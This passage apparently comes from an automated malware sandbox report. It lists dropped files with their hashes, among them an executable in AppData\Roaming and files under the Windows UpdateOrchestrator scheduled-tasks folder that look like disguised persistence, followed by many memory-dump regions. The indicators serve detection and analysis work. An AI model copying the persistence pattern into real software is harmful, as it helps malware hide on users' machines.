                                                                                                                                                                                                                                    374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce

                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\x69install.exe

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    181KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    b89953da384c6a80b03e5b3abece33c9

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    8495ca680bc958f7b1c5525c2e92200fc9fa1864

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963

                                                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    f313c5b4f95605026428425586317353

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                    0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                    9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2KB

                                                                                                                                                                                                                                    MD5

MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

• C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: aa187cac09f051e24146ad549a0f08a6
SHA1: 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA256: 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512: 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

• memory/384-630-0x000001B877080000-0x000001B8770AC000-memory.dmp (Filesize: 176KB)
• memory/616-604-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp (Filesize: 64KB)
• memory/616-603-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp (Filesize: 176KB)
• memory/616-597-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp (Filesize: 176KB)
• memory/616-596-0x0000015CFBB40000-0x0000015CFBB6C000-memory.dmp (Filesize: 176KB)
• memory/616-595-0x0000015CFBB10000-0x0000015CFBB36000-memory.dmp (Filesize: 152KB)
• memory/640-570-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/640-59-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/640-1560-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/676-614-0x000002107C320000-0x000002107C34C000-memory.dmp (Filesize: 176KB)
• memory/676-615-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp (Filesize: 64KB)
• memory/676-608-0x000002107C320000-0x000002107C34C000-memory.dmp (Filesize: 176KB)
• memory/960-619-0x000002B8D1BA0000-0x000002B8D1BCC000-memory.dmp (Filesize: 176KB)
• memory/960-625-0x000002B8D1BA0000-0x000002B8D1BCC000-memory.dmp (Filesize: 176KB)
• memory/960-626-0x00007FFDC2990000-0x00007FFDC29A0000-memory.dmp (Filesize: 64KB)
• memory/1008-25-0x0000000000E90000-0x0000000000EA8000-memory.dmp (Filesize: 96KB)
• memory/2356-160-0x0000000000B50000-0x0000000000B81000-memory.dmp (Filesize: 196KB)
• memory/2700-1559-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/2700-569-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/2700-57-0x00000000003E0000-0x00000000003E9000-memory.dmp (Filesize: 36KB)
• memory/3000-19-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp (Filesize: 10.8MB)
• memory/3000-16-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp (Filesize: 10.8MB)
• memory/3000-15-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp (Filesize: 10.8MB)
• memory/3000-10-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp (Filesize: 10.8MB)
• memory/3000-9-0x00000282FD3A0000-0x00000282FD3C2000-memory.dmp (Filesize: 136KB)
• memory/3000-3-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp (Filesize: 10.8MB)
• memory/4472-147-0x0000000000F90000-0x0000000000F99000-memory.dmp (Filesize: 36KB)
• memory/4472-1561-0x0000000000F90000-0x0000000000F99000-memory.dmp (Filesize: 36KB)
• memory/4480-588-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp (Filesize: 2.0MB)
• memory/4480-589-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp (Filesize: 760KB)
• memory/4588-146-0x0000000000B50000-0x0000000000B81000-memory.dmp (Filesize: 196KB)
• memory/4828-574-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp (Filesize: 2.0MB)
• memory/4828-575-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp (Filesize: 760KB)
• memory/4844-384-0x0000000000400000-0x0000000000420000-memory.dmp (Filesize: 128KB)
• memory/5088-577-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
• memory/5088-581-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
• memory/5088-578-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
• memory/5088-579-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)
• memory/5088-590-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp (Filesize: 2.0MB)
• memory/5088-591-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp (Filesize: 760KB)
• memory/5088-592-0x0000000140000000-0x0000000140008000-memory.dmp (Filesize: 32KB)

                                                                                                                                                                                                                                  • memory/5088-576-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                  • memory/5232-572-0x00007FFE02910000-0x00007FFE02B05000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                  • memory/5232-571-0x000001BAFEC20000-0x000001BAFEC4A000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    168KB

                                                                                                                                                                                                                                  • memory/5232-573-0x00007FFE02810000-0x00007FFE028CE000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    760KB

                                                                                                                                                                                                                                  • memory/5408-56-0x00007FFDE4843000-0x00007FFDE4845000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                  • memory/5408-0-0x00007FFDE4843000-0x00007FFDE4845000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                  • memory/5408-2-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                  • memory/5408-1-0x0000000000D50000-0x0000000000D9E000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    312KB

                                                                                                                                                                                                                                  • memory/5408-145-0x00007FFDE4840000-0x00007FFDE5301000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                  • memory/5740-318-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                  • memory/5740-47-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                    128KB